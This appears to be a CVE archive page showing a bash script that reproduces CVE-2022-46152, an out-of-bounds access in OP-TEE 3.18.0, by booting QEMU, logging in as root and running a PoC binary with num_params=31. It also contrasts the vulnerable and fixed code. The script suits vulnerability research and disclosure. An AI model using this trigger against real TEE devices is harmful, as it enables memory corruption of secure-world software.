5465 Total CVEs
26 Years
GitHub
Home / 2022 / CVE-2022-46152
README.md
Rendering markdown...
POC / exploit.sh SH
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env bash
# =============================================================================
# exploit.sh — Automated reproduction of CVE-2022-46152 using an expect script
#              to drive QEMU
#
# Usage:
#   ./exploit.sh           # Fully automated run; prints results to stdout
#   ./exploit.sh --manual  # Print manual reproduction steps only
# =============================================================================
set -euo pipefail

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
OPTEE_DIR="${SCRIPT_DIR}/optee"
BINARIES_DIR="${OPTEE_DIR}/out/bin"
SOC_TERM="${OPTEE_DIR}/build/soc_term.py"
LOG_NW="${SCRIPT_DIR}/normal_world.log"
LOG_SW="${SCRIPT_DIR}/secure_world.log"

info()    { echo -e "\033[1;34m[INFO]\033[0m  $*"; }
ok()      { echo -e "\033[1;32m[ OK ]\033[0m  $*"; }
section() { echo -e "\n\033[1;36m=== $* ===\033[0m"; }

# --------------------------------------------------------------------------- #
# Manual reproduction steps
# --------------------------------------------------------------------------- #
if [[ "${1:-}" == "--manual" ]]; then
    cat <<'EOF'

========================================
CVE-2022-46152 Manual Reproduction Steps
========================================

1. Start the QEMU environment (three terminal windows):

   # Terminal 1 — Start QEMU:
   ./run_qemu.sh --no-gdb

   # Terminal 2 — Normal World (Linux console):
   python3 optee/build/soc_term.py 54320

   # Terminal 3 — Secure World (OP-TEE secure log):
   python3 optee/build/soc_term.py 54321

2. Wait for both UART terminals to show "listening on port ..." before starting QEMU

3. Wait for the Normal World terminal to show the Linux login prompt, then type:
   (none) login: root

4. Run the PoC in the Linux shell:
   /root/cve_2022_46152

5. Observe the output:
   - Normal World terminal: PoC prints trigger information
   - Secure World terminal: OP-TEE TEE core prints OOB access evidence

========================================
Expected Output (vulnerable OP-TEE 3.18.0)
========================================

Normal World:
  === CVE-2022-46152 PoC Exploit ===
  [+] Opened /dev/tee0
  [+] Session opened: id=1
  [*] Triggering vulnerability: invoking with num_params=31
  [+] VULNERABILITY TRIGGERED!
  [+] TEE returned TEE_ERROR_BAD_PARAMETERS (0xFFFF0006)

Secure World (OP-TEE UART):
  E/TC: entry_std.c:xxx  CVE-2022-46152: OOB! cleanup_shm_refs num_params=31 > TEE_NUM_PARAMS=4

========================================
Vulnerable vs. Fixed Code
========================================

Vulnerable code (3.18.0) core/tee/entry_std.c:
  cleanup_shm_refs(saved_attr, &param, num_params);
  //                                   ^^^^^^^^^^
  // num_params can be 31, but saved_attr[4] only has 4 slots!

Fixed code (3.19.0) commit 728616b:
  cleanup_shm_refs(saved_attr, &param, MIN(TEE_NUM_PARAMS, num_params));
  //                                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  // Capped to min(4, 31) = 4; no more out-of-bounds access

EOF
    exit 0
fi

# --------------------------------------------------------------------------- #
# Automated reproduction (requires expect)
# --------------------------------------------------------------------------- #
command -v expect >/dev/null 2>&1 || {
    info "expect not found; use --manual for manual steps"
    exec "$0" --manual
}

[[ -f "${BINARIES_DIR}/bl1.bin" ]] || {
    echo "[!] Environment not built. Please run ./setup.sh first"
    exit 1
}

section "Automated reproduction of CVE-2022-46152"

# Locate QEMU (consistent with run_qemu.sh)
QEMU_BIN="${OPTEE_DIR}/qemu/build/aarch64-softmmu/qemu-system-aarch64"
[[ -x "${QEMU_BIN}" ]] || { echo "[!] qemu-system-aarch64 not found"; exit 1; }
info "Using QEMU: ${QEMU_BIN}"

cd "${BINARIES_DIR}"
ln -sf "${OPTEE_DIR}/out-br/images/rootfs.cpio.gz" "rootfs.cpio.gz" 2>/dev/null || true

info "Starting Secure World UART log server (port 54321)..."

# Secure World log server: simple TCP server that does not require a TTY
# (soc_term.py needs a TTY)
SW_LOGGER='
import socket, sys
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("127.0.0.1", 54321))
s.listen(1)
print("listening on port 54321", flush=True)
conn, _ = s.accept()
while True:
    d = conn.recv(4096)
    if not d:
        break
    sys.stdout.buffer.write(d)
    sys.stdout.buffer.flush()
'
python3 -c "${SW_LOGGER}" > "${LOG_SW}" 2>&1 &
SW_PID=$!

# Wait for Secure World port to be in LISTEN state (use ss to avoid consuming accept())
info "Waiting for Secure World port (54321)..."
while ! ss -tln 2>/dev/null | grep -q ':54321'; do sleep 0.5; done
info "Secure World port ready"

info "Starting QEMU, waiting for system boot (~30-60 seconds)..."

# Note: unquoted heredoc to allow bash variable expansion (${BINARIES_DIR} etc.)
# Spawn QEMU directly: first serial port (-serial stdio) is driven by expect via PTY
# for the Linux console; second serial port (-serial tcp:localhost:54321) connects to
# the Secure World log server. No soc_term.py intermediary needed, avoiding EOF issues
# caused by PTY master fd inheritance during exec.
expect -f - << EXPECT_SCRIPT
set timeout 180
log_file -noappend ${LOG_NW}

spawn ${QEMU_BIN} \
    -display none \
    -serial stdio \
    -serial tcp:localhost:54321 \
    -smp 2 \
    -machine virt,secure=on,mte=off,gic-version=3,virtualization=false \
    -cpu max,sve=off \
    -d unimp \
    -semihosting-config enable=on,target=native \
    -m 1057 \
    -bios bl1.bin \
    -initrd rootfs.cpio.gz \
    -kernel Image \
    -no-acpi \
    -no-reboot \
    -monitor none \
    -append {console=ttyAMA0,38400 keep_bootcon root=/dev/vda2}

expect {
    "login:" { send "root\r" }
    timeout  { puts "\n\[!\] Boot timed out"; exit 1 }
}

expect {
    "# " { send "/root/cve_2022_46152\r" }
    timeout { puts "\n\[!\] Login timed out"; exit 1 }
}

expect {
    "VULNERABILITY TRIGGERED" {
        puts "\n\[+\] Reproduction successful! CVE-2022-46152 triggered"
    }
    "TEE returned TEE_ERROR_BAD_PARAMETERS" {
        puts "\n\[+\] OOB occurred (TEE_ERROR_BAD_PARAMETERS returned)"
    }
    timeout {
        puts "\n\[?\] Timed out; check log ${LOG_NW}"
    }
}

expect "# "
send "poweroff\r"
# Wait for QEMU to shut down (expect receives eof when the process exits)
expect {
    eof     { puts "\n\[*\] QEMU has shut down" }
    timeout { puts "\n\[*\] Shutdown wait timed out, continuing..." }
}
EXPECT_SCRIPT

# Wait for Secure World log server to exit
wait "${SW_PID}" 2>/dev/null || true

info "Normal World log: ${LOG_NW}"
info "Secure World log: ${LOG_SW}"
echo ""
info "Key Secure World log lines (CVE-2022-46152 trigger evidence):"
grep -a "CVE-2022-46152\|OOB\|E/TC" "${LOG_SW}" | head -20 || info "(Secure World log is empty or no matches)"